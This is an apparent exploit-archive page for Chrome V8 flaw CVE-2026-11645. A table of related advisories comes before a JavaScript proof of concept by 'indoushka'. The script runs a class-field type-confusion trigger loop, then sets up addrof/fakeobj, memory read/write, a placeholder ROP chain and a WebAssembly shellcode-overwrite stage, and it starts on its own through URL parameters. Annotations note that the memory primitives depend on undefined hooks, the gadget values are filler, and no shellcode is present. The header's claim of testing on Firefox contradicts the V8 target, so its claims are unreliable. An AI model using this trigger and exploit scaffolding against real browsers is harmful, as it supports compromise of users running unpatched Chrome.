| Reporter | Title | Published | Views | Family All 221 |
|---|---|---|---|---|
| Exploit for Out-of-bounds Read in Google Chrome | 10 Jun 202623:06 | โ | githubexploit | |
| Exploit for Out-of-bounds Read in Google Chrome | 10 Jun 202615:02 | โ | githubexploit | |
| CVE-2026-11645 | 8 Jun 202623:27 | โ | attackerkb | |
| CVE-2026-11645 | 8 Jun 202623:27 | โ | alpinelinux | |
| June Linux Patch Wednesday | 26 Jun 202617:00 | โ | avleonov | |
| The vulnerability of the JavaScript script handler in Google Chrome's V8 engine allows attackers to execute arbitrary code. | 10 Jun 202600:00 | โ | bdu_fstec | |
| CVE-2026-11645 vulnerabilities | 10 Jun 202601:17 | โ | cgr | |
| CVE-2026-11645 | 8 Jun 202618:00 | โ | circl | |
| Google Chromium V8 Out-of-Bounds Read and Write Vulnerability | 9 Jun 202600:00 | โ | cisa_kev | |
| CISA Adds Three Known Exploited Vulnerabilities to Catalog | 9 Jun 202612:00 | โ | cisa |
==================================================================================================================================
| # Title : Google Chrome V8 Type Confusion Exploit Payload met Memory Primitives |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://chromereleases.googleblog.com |
==================================================================================================================================
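[+] Summary : This JavaScript exploit targets a type confusion vulnerability in the V8 engine of Google Chrome (versions prior to 149.0.7827.103).
It runs inside the browser and attempts to trigger a JIT optimization flaw using repeated object construction patterns.
As listed, only the trigger loop is self-contained: the memory primitives are calls to `window._addrof`, `window._fakeobj`, `window._read`, `window._write` and `window.corruptBackingStore`, none of which the listing defines; the ROP gadget addresses are filler values; and no shellcode is included.
The "Tested on" line in the header names Mozilla Firefox, which does not use V8.
The related entries on this page include a CISA Known Exploited Vulnerabilities listing, so Chrome installs below the version named above should be updated.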
[+] POC :
(function() {
'use strict';
// Tunables shared by the functions below. All values are plain counts or
// milliseconds; nothing here is an address or a payload.
const CONFIG = {
  // Constructions performed while the class field holds the integer 2.
  TRAINING_ITERATIONS: 800,
  // Constructions performed after the field value is switched to 1.1.
  TRIGGER_ITERATIONS: 1500,
  // How many times strongTrigger() repeats the whole trigger routine.
  STRONG_TRIGGER_COUNT: 5,
  // Number of exploit() runs scheduled by autoStressTest().
  STRESS_CYCLES: 8,
  // Delay between those runs, in milliseconds.
  STRESS_DELAY_MS: 700,
};
/**
 * Append a timestamped line to the page and mirror it to the console.
 *
 * The line is written with `textContent`, so markup inside `msg` is shown
 * as text and is not parsed as HTML.
 *
 * @param {string} msg - Message text.
 * @param {string} [type='info'] - One of 'info', 'success', 'warning',
 *   'error'; any other value falls back to the 'info' colour.
 */
function log(msg, type = 'info') {
  const palette = {
    info: '#00ccff',
    success: '#00ff88',
    warning: '#ffaa00',
    error: '#ff4444'
  };
  // Prefer a dedicated #status element; otherwise write into <body>.
  const target = document.getElementById('status') || document.body;
  const line = `[${new Date().toLocaleTimeString()}] ${msg}`;

  if (target) {
    const row = document.createElement('div');
    row.style.color = palette[type] || palette.info;
    row.textContent = line;
    target.appendChild(row);
  }

  console.log(line);
}
/**
 * Run the construction pattern that the page's summary describes as the
 * attempt to reach the JIT optimization flaw.
 *
 * A class extending Function, with one instance field initialised from the
 * closure variable `value`, is constructed CONFIG.TRAINING_ITERATIONS times
 * while `value` is the integer 2, then CONFIG.TRIGGER_ITERATIONS times after
 * `value` has been changed to the double 1.1.
 *
 * @returns {boolean} true when both loops finish without throwing, false
 *   when an exception was caught. The result reflects only the absence of an
 *   exception; no engine or memory state is inspected, so `true` is not
 *   evidence that the browser misbehaved.
 */
function triggerTypeConfusion() {
try {
let value = 2;
class C extends Function {
// Computed-key instance field; its initialiser reads `value` on every construction.
['AA'] = value;
}
// First phase: every instance stores the integer 2 in the field.
for (let i = 0; i < CONFIG.TRAINING_ITERATIONS; i++) {
new C("'use strict'");
}
// Second phase: same constructor, but the field now receives a double.
value = 1.1;
for (let i = 0; i < CONFIG.TRIGGER_ITERATIONS; i++) {
new C("'use strict'");
}
return true;
} catch (e) {
log(`Trigger error: ${e.message}`, 'error');
return false;
}
}
/**
 * Repeat triggerTypeConfusion() CONFIG.STRONG_TRIGGER_COUNT times, logging
 * each run.
 *
 * @returns {boolean} true if at least one run returned true. Because
 *   triggerTypeConfusion() returns true whenever it does not throw, this is
 *   not a signal that anything was corrupted.
 */
function strongTrigger() {
  const total = CONFIG.STRONG_TRIGGER_COUNT;
  let anySucceeded = false;

  for (let run = 1; run <= total; run++) {
    log(`Strong trigger run ${run}/${total}...`);
    if (!triggerTypeConfusion()) {
      continue;
    }
    anySucceeded = true;
    log(`Trigger ${run} successful`, 'success');
  }

  return anySucceeded;
}
/**
 * Forward to `window._addrof` when the page provides one.
 *
 * Nothing in this listing defines `window._addrof`, so as published this
 * always returns null.
 *
 * @param {*} obj - Value handed to the external hook.
 * @returns {*} The hook's result, or null when no hook is installed.
 */
function addrof(obj) {
  return typeof window._addrof === 'function' ? window._addrof(obj) : null;
}
/**
 * Forward to `window._fakeobj` when the page provides one.
 *
 * Nothing in this listing defines `window._fakeobj`, and no code in the
 * listing calls this function.
 *
 * @param {*} addr - Value handed to the external hook.
 * @returns {*} The hook's result, or null when no hook is installed.
 */
function fakeobj(addr) {
  return typeof window._fakeobj === 'function' ? window._fakeobj(addr) : null;
}
/**
 * Forward to `window._read` when the page provides one.
 *
 * Nothing in this listing defines `window._read`, so as published this
 * always returns null.
 *
 * @param {*} addr - First argument for the external hook.
 * @param {*} size - Second argument for the external hook.
 * @returns {*} The hook's result, or null when no hook is installed.
 */
function readMemory(addr, size) {
  return typeof window._read === 'function' ? window._read(addr, size) : null;
}
/**
 * Forward to `window._write` when the page provides one.
 *
 * Nothing in this listing defines `window._write`, so as published this
 * always returns false.
 *
 * @param {*} addr - First argument for the external hook.
 * @param {*} data - Second argument for the external hook.
 * @returns {*} The hook's result, or false when no hook is installed.
 */
function writeMemory(addr, data) {
  return typeof window._write === 'function' ? window._write(addr, data) : false;
}
/**
 * Build the object that exploit() treats as its "memory primitives".
 *
 * Allocates a 0x1000-byte ArrayBuffer with a DataView and passes the view to
 * `window.corruptBackingStore` if such a function exists. The listing does
 * not define that function, so as published this logs the start message and
 * returns null, which makes exploit() stop with an error.
 *
 * @returns {{dataView: DataView, read: Function, write: Function}|null}
 *   Wrapper around readMemory()/writeMemory(), or null when the external
 *   hook is missing or throws.
 */
function setupPrimitives() {
  log("Setting up memory primitives...");
  try {
    const buffer = new ArrayBuffer(0x1000);
    const view = new DataView(buffer);

    // Without the externally supplied hook there is nothing to return.
    if (typeof window.corruptBackingStore !== 'function') {
      return null;
    }

    window.corruptBackingStore(view);
    return {
      dataView: view,
      read: (addr, size) => readMemory(addr, size),
      write: (addr, data) => writeMemory(addr, data)
    };
  } catch (e) {
    log(`Failed to setup primitives: ${e}`, 'error');
  }
  return null;
}
/**
 * Log the address reported for a throwaway object and a masked value the
 * author labels a "Chrome base candidate".
 *
 * Depends entirely on addrof(), which returns null unless an external
 * `window._addrof` hook exists; the listing defines none, so as published
 * this returns null.
 *
 * @returns {number|null} The masked value, or null when addrof() yields a
 *   falsy result.
 */
function findChromeBase() {
const dummy = {};
const addr = addrof(dummy);
if (addr) {
log(`Found object address: 0x${addr.toString(16)}`);
// NOTE(review): the listing does not show how an object address would relate
// to a module base; the "base candidate" label is the author's assumption.
const base = addr & ~0xFFFFFFFF;
log(`Chrome base candidate: 0x${base.toString(16)}`);
return base;
}
return null;
}
/**
 * Assemble a byte array from a fixed list of "gadget" values and constants.
 *
 * The gadget table holds filler patterns (0x4141…, 0x4242…, and so on), not
 * addresses taken from any binary, and `virtual_protect` is defined but never
 * used. No code in this listing calls this function.
 *
 * @param {*} shellcodeAddr - Value placed after the `pop_rcx` entry.
 * @returns {Uint8Array} Byte view over a Uint32Array built from the list.
 */
function buildROPChain(shellcodeAddr) {
// Placeholder values only; none of these is a real code address.
const gadgets = {
pop_rax: 0x414141414141,
pop_rcx: 0x424242424242,
pop_rdx: 0x434343434343,
pop_rsi: 0x444444444444,
pop_rdi: 0x454545454545,
syscall: 0x464646464646,
virtual_protect: 0x474747474747
};
const chain = [
gadgets.pop_rax, 0x50,
gadgets.pop_rcx, shellcodeAddr,
gadgets.pop_rdx, 0x1000,
gadgets.pop_rsi, 0x40,
gadgets.pop_rdi, 0,
gadgets.syscall
];
return new Uint8Array(new Uint32Array(chain).buffer);
}
/**
 * Scaffold for the payload stage: instantiate a small WebAssembly module,
 * look up an address for `exports.main` through addrof(), pass `shellcode`
 * to writeMemory() at that address plus 0x10, then call the function.
 *
 * No code in this listing calls this function and the page contains no
 * shellcode bytes. addrof() and writeMemory() only forward to `window._addrof`
 * and `window._write`, which the listing does not define, so the write branch
 * is not reached as published.
 *
 * @param {*} shellcode - Data forwarded unchanged to writeMemory().
 * @returns {boolean} true only if the branch guarded by `funcAddr` completes;
 *   false otherwise, including when an exception is caught and logged.
 */
function executeShellcode(shellcode) {
log("Attempting to execute shellcode...");
try {
const wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,4,1,96,0,0,3,2,1,0,10,4,1,0,11]);
const wasmModule = new WebAssembly.Module(wasmCode);
const wasmInstance = new WebAssembly.Instance(wasmModule, {});
const wasmFunc = wasmInstance.exports.main;
// Overwrite wasm function with shellcode
const funcAddr = addrof(wasmFunc);
// Skipped whenever addrof() returns null (no external hook installed).
if (funcAddr) {
writeMemory(funcAddr + 0x10, shellcode);
wasmFunc();
log("Shellcode executed!", "success");
return true;
}
} catch (e) {
log(`Shellcode execution failed: ${e}`, 'error');
}
return false;
}
/**
 * Top-level sequence: log a banner, report the browser version, run
 * strongTrigger(), then setupPrimitives() and findChromeBase().
 *
 * The function is declared async but contains no await. It never calls
 * buildROPChain() or executeShellcode(); the last step is the log line
 * "Ready for payload execution". With the listing as published,
 * setupPrimitives() returns null, so the promise resolves to false.
 *
 * @returns {Promise<boolean>} false when strongTrigger() or
 *   setupPrimitives() reports failure, true otherwise.
 */
async function exploit() {
log("Starting CVE-2026-11645 exploit...");
log(`Target: Chrome < 149.0.7827.103`);
const ua = navigator.userAgent;
const chromeMatch = ua.match(/Chrome\/(\d+)/);
if (chromeMatch) {
// Only the major version is compared, so any 149.x build is reported as
// patched even if it is older than 149.0.7827.103. The user-agent string is
// self-reported, so this message is not a reliable patch-status check.
const version = parseInt(chromeMatch[1]);
log(`Detected Chrome version: ${version}`);
if (version >= 149) {
log("Browser appears patched", "warning");
} else {
log("Browser appears vulnerable", "success");
}
}
// The version result is only logged; execution continues either way.
log("Triggering type confusion...");
if (!strongTrigger()) {
log("Failed to trigger type confusion", "error");
return false;
}
// Logged whenever a trigger run finished without throwing; nothing here
// verifies that the engine state actually changed.
log("Type confusion triggered successfully!", "success");
const primitives = setupPrimitives();
if (!primitives) {
log("Failed to setup memory primitives", "error");
return false;
}
log("Memory primitives ready", "success");
const chromeBase = findChromeBase();
if (!chromeBase) {
log("Failed to find Chrome base", "warning");
}
log("Ready for payload execution");
return true;
}
/**
 * Schedule exploit() to run CONFIG.STRESS_CYCLES times, one run every
 * CONFIG.STRESS_DELAY_MS milliseconds.
 *
 * The promise returned by exploit() is not awaited, so runs are started on
 * the timer regardless of whether the previous one has settled.
 *
 * @returns {*} The handle returned by setInterval.
 */
function autoStressTest() {
  log(`Starting auto stress test (${CONFIG.STRESS_CYCLES} cycles)...`);
  let completed = 0;

  const timer = setInterval(function runCycle() {
    completed += 1;
    log(`Stress cycle ${completed}/${CONFIG.STRESS_CYCLES}`);
    exploit();
    if (completed < CONFIG.STRESS_CYCLES) {
      return;
    }
    // Final cycle: stop the timer and report completion.
    clearInterval(timer);
    log("Auto stress test completed");
  }, CONFIG.STRESS_DELAY_MS);

  return timer;
}
// Expose the entry points on a global object. The property name
// `window.CVE_2026_11645` is a fixed string that can be searched for when
// checking whether a page embeds this listing.
window.CVE_2026_11645 = {
  exploit: exploit,
  autoStressTest: autoStressTest,
  trigger: triggerTypeConfusion,
  strongTrigger: strongTrigger
};

// The script starts on its own when the URL query string contains
// `auto=true` or `exploit=true` (substring match), one second after load.
// Otherwise it only prints usage text.
const query = window.location.search;
if (query.includes('auto=true')) {
  setTimeout(() => autoStressTest(), 1000);
} else if (query.includes('exploit=true')) {
  setTimeout(() => exploit(), 1000);
} else {
  log("CVE-2026-11645 Exploit Ready", "success");
  log("Use ?auto=true for auto-stress or ?exploit=true for single exploit", "info");
}
})();
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================